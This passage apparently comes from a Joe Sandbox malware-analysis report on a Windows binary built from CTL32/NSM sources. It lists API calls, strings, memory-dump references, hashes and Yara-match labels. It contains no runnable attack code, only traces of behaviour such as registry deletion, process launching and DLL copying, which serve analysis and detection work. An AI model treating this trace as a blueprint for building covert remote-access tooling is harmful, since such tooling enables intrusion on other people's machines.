                                                                                                                        • _malloc.LIBCMT ref: 00B055A8
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • wsprintfW.USER32 ref: 00B055F5
                                                                                                                        • _free.LIBCMT ref: 00B05679
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeapOpenQueryValue_free_mallocwsprintf
                                                                                                                        • String ID: %s\%s
                                                                                                                        APIs
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AF4FE1
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF502B
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF509A
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$__wcsicoll
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: string too long
                                                                                                                        APIs
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B18F85
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                        • String ID: ..\CTL32\util.cpp$nsmdir >= 0 && nsmdir < GP_MAX$psz != szTempExpanded
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: __alloca_probe_16__itow_wcschr
                                                                                                                        • String ID: !#$%&'()*+,/:;=?@[]
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B32099
                                                                                                                        • DeleteAce.ADVAPI32(00000104,00000000), ref: 00B32106
                                                                                                                        • LocalFree.KERNEL32(?), ref: 00B32124
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDeleteFreeLocalProc
                                                                                                                        • String ID: GetNamedSecurityInfoW
                                                                                                                        • API String ID: 3891521895-3879530689
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                        • API String ID: 4104443479-323366856
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,RtlCaptureStackBackTrace), ref: 00B153EC
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B153F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: RtlCaptureStackBackTrace$kernel32.dll
                                                                                                                        • API String ID: 1646373207-94782561
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyW.ADVAPI32(?,?,?), ref: 00AFED91
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 00AFEDA6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFEDC5
                                                                                                                        Strings
                                                                                                                        • RegDeleteKey(%s, %s) ret %d, xrefs: 00AFEDB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDelete
                                                                                                                        • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                                                        • API String ID: 716773620-1181619153
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyW.ADVAPI32(?,?,?), ref: 00AFED91
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 00AFEDA6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFEDC5
                                                                                                                        Strings
                                                                                                                        • RegDeleteKey(%s, %s) ret %d, xrefs: 00AFEDB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDelete
                                                                                                                        • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                                                        • API String ID: 716773620-1181619153
                                                                                                                        APIs
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00B24C71
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CopyFile
                                                                                                                        • String ID: localmon$pcimon$pcimon.dll
                                                                                                                        • API String ID: 1304948518-3058681259
                                                                                                                        APIs
                                                                                                                        • InterlockedIncrement.KERNEL32(00B8B6D0), ref: 00B000BA
                                                                                                                        • wsprintfW.USER32 ref: 00B000E6
                                                                                                                        • CreateEventW.KERNEL32(?,?,?,?), ref: 00B00106
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventIncrementInterlockedwsprintf
                                                                                                                        • String ID: %s_L%d_%x
                                                                                                                        • API String ID: 608154824-3441399356
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 00B2AF5D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AF68
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • _memset.LIBCMT ref: 00B2AFAD
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B2AFE2
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B2B01C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B02F
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B038
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00B2B04D
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B2B07D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$Handle$CreateDeleteLoadObjectOpenProcessQuerySingleStringValueWait_memsetwvsprintf
                                                                                                                        • String ID: UninstallString
                                                                                                                        • API String ID: 1420948804-1433857529
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 00B169D0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetGestureConfig), ref: 00B169E0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: SetGestureConfig$user32.dll
                                                                                                                        • API String ID: 2574300362-2478114855
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcspbrk
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$nsChars.IsA()
                                                                                                                        • API String ID: 402402107-2794583141
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B18BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18C1C
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 00B18C5F
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 00B18CB7
                                                                                                                        • wsprintfW.USER32 ref: 00B1ED4E
                                                                                                                        • wsprintfW.USER32 ref: 00B1ED64
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPathwsprintf$FileModuleName
                                                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC
                                                                                                                        • API String ID: 341647881-3388120946
                                                                                                                        APIs
                                                                                                                        • RemoveDirectoryW.KERNEL32(00B8C848,00000000,?,00B2CF57), ref: 00B26961
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryRemove
                                                                                                                        • String ID: cic\delta.zip$cic\setup.exe$cic\setup.msi
                                                                                                                        • API String ID: 597925465-3980332394
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 00B0437E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 00B0439A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: _TrackMouseEvent$comctl32.dll
                                                                                                                        • API String ID: 2574300362-2314894490
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • \StringFileInfo\%04x%04x\FileDescription, xrefs: 00AF6041
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$QueryValuewsprintf
                                                                                                                        • String ID: \StringFileInfo\%04x%04x\FileDescription
                                                                                                                        • API String ID: 252175919-3471089032
                                                                                                                        APIs
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 00B303A4
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00B303B5
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 00B303C8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Find$Long
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 189972333-2988720461
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window
                                                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                                        • API String ID: 2353593579-1331251348
                                                                                                                        APIs
                                                                                                                        • GetDeviceCaps.GDI32(?,0000000E), ref: 00B06322
                                                                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 00B06329
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice
                                                                                                                        • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                                                        • API String ID: 328075279-4292231205
                                                                                                                        • Opcode ID: 2fc63ceacedea27233e7c72ed74e2c15e481ca1437ddd00036a9d422bf2bc596
                                                                                                                        • Instruction ID: 31490022a7c1e4db82cdba8c83e7ced4c279d2b456ec4d796038332fc374c91b
                                                                                                                        • Opcode Fuzzy Hash: 2fc63ceacedea27233e7c72ed74e2c15e481ca1437ddd00036a9d422bf2bc596
                                                                                                                        • Instruction Fuzzy Hash: 84E04F27B9132837F61021996C86F8AB7CCAB95BA8F050172FF08BB2D2D5D5AD0047E0
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B24877
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 00B2489C
                                                                                                                          • Part of subcall function 00B3CC21: _doexit.LIBCMT ref: 00B3CC2D
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$LocalMessageTime_doexit_mallocwvsprintf
                                                                                                                        • String ID: Assert failed, file %hs, line %d$WINST32
                                                                                                                        • API String ID: 3844741748-2703300672
                                                                                                                        • Opcode ID: d270410e8fb842ec8a521ec6f9bdeaad46b2b3e2d4a3d50c9656124cc65d426f
                                                                                                                        • Instruction ID: fb75957137a8e683aaa2739295cec8afba5da7b740deebf651460d53dcec60c8
                                                                                                                        • Opcode Fuzzy Hash: d270410e8fb842ec8a521ec6f9bdeaad46b2b3e2d4a3d50c9656124cc65d426f
                                                                                                                        • Instruction Fuzzy Hash: A3F03EB594030D6BDB14EFE4DC4AF5577BCEB04704F408494F71957192EAB0B6448F55
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 00B12FBE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 00B12FCF
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: _TrackMouseEvent$comctl32.dll
                                                                                                                        • API String ID: 2574300362-2314894490
                                                                                                                        • Opcode ID: 937131bd6c74a5dbe22033928dc5bb47d82733829ec8387ff8ddd6517d1cc1de
                                                                                                                        • Instruction ID: 0dfaa88e2331623990c659815e493c75318e8355062505b3c86f0592a5539563
                                                                                                                        • Opcode Fuzzy Hash: 937131bd6c74a5dbe22033928dc5bb47d82733829ec8387ff8ddd6517d1cc1de
                                                                                                                        • Instruction Fuzzy Hash: 07C012B82413029ECB001F28AC88B423BA8E710B0AF80048AF016832F0FFBCC040DB68
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2782032738-0
                                                                                                                        • Opcode ID: 9b3dec1c82373722532c2f7c0ddb0a24596b00127aa110e2029f7ecbda38095e
                                                                                                                        • Instruction ID: cf287f4aa62d8df915c6914e54b0c3195e5a077b856a43f037c77ca893a1e53a
                                                                                                                        • Opcode Fuzzy Hash: 9b3dec1c82373722532c2f7c0ddb0a24596b00127aa110e2029f7ecbda38095e
                                                                                                                        • Instruction Fuzzy Hash: 6641B3B1A487059BDB398F698895A9EBBF5EF90320F3585EDE41597240DF70ED40CB40
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B4AB0E
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00B4AB41
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,00B55FC8,00000109,00BFBBEF,00000003), ref: 00B4AB72
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,00B55FC8,00000109,00BFBBEF,00000003), ref: 00B4ABE0
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: b2e45e825541417e0f1713069e146d719b98466f51040415b44104b53cc95477
                                                                                                                        • Instruction ID: ad2c2d194ba00b47122155f07ee3ab78f2ab3a1c3954c2bfd9e59645dae0a5d5
                                                                                                                        • Opcode Fuzzy Hash: b2e45e825541417e0f1713069e146d719b98466f51040415b44104b53cc95477
                                                                                                                        • Instruction Fuzzy Hash: 0F31CD31A44246EFDB20DFA4C8859AE7BE6EF01310F1485E9E4619B191E730DE41EB52
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B1E184
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B1E199
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1338273076-0
                                                                                                                        • Opcode ID: 20afdad4ea43f3a9bceafb899b410ac23c1e9f9016dcb04b833ae922257915ee
                                                                                                                        • Instruction ID: 30b22c6677a85e32664f0378f094bac0ddd126b97a27dd00b4a94f68d921b5b6
                                                                                                                        • Opcode Fuzzy Hash: 20afdad4ea43f3a9bceafb899b410ac23c1e9f9016dcb04b833ae922257915ee
                                                                                                                        • Instruction Fuzzy Hash: 5E31AB75A003049FD714DF98C540AAABBF8EF18700F1084DEE8699B792E770EE44CBA1
                                                                                                                        APIs
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AE20E8
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 00AE2117
                                                                                                                        • _fputs.LIBCMT ref: 00AE2122
                                                                                                                        • _fputc.LIBCMT ref: 00AE212A
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__alloca_probe_16_fputc_fputs
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1846584904-0
                                                                                                                        • Opcode ID: a519d2fe114866df750f938073d11aadd3021474cd3cc81a4e4b415ca9706fca
                                                                                                                        • Instruction ID: ae97ef5998a41d28299cbcc118c6813f92ba29c04d7be21b3922acd6f9ca6c4c
                                                                                                                        • Opcode Fuzzy Hash: a519d2fe114866df750f938073d11aadd3021474cd3cc81a4e4b415ca9706fca
                                                                                                                        • Instruction Fuzzy Hash: 2C21A135600204ABCB249F58DC86FAB77A9EF89300F588194FE459F395EA70AE05C7E1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B1D3F4
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B1D409
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B20562
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B20577
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B3CCA5
                                                                                                                          • Part of subcall function 00B38F7B: __getptd.LIBCMT ref: 00B38F8E
                                                                                                                        • ___ascii_memicmp.LIBCMT ref: 00B3CCEF
                                                                                                                        • __tolower_l.LIBCMT ref: 00B3CD1B
                                                                                                                        • __tolower_l.LIBCMT ref: 00B3CD2B
                                                                                                                          • Part of subcall function 00B3CFC7: __getptd_noexit.LIBCMT ref: 00B3CFC7
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale__tolower_l$UpdateUpdate::____ascii_memicmp__getptd__getptd_noexit
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$_wcsncpy
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: FromString$_free_malloc
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AE68D4
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AE68E9
                                                                                                                        • _malloc.LIBCMT ref: 00AE6911
                                                                                                                        • _memmove.LIBCMT ref: 00AE691C
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc$Exception@8Throw_memmove_memsetstd::exception::exceptionwsprintf
                                                                                                                        APIs
                                                                                                                        • RegCloseKey.ADVAPI32(?,5E06C67B), ref: 00AE8C11
                                                                                                                        • RegCloseKey.ADVAPI32(?,5E06C67B), ref: 00AE8C1B
                                                                                                                        • RegCloseKey.ADVAPI32(?,5E06C67B), ref: 00AE8C25
                                                                                                                        • DeleteCriticalSection.KERNEL32 ref: 00AE8C37
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CriticalDeleteSection
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?), ref: 00B248F5
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00B24936
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumOpen
                                                                                                                        APIs
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B30B4C
                                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 00B30B5C
                                                                                                                        • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 00B30B75
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B30B92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseFullHandleImageNameOpenQueryThreadWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2863166696-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        APIs
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00B12561
                                                                                                                        • SetRect.USER32(?,?,?,?,?), ref: 00B12579
                                                                                                                        • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00B12590
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00B12598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
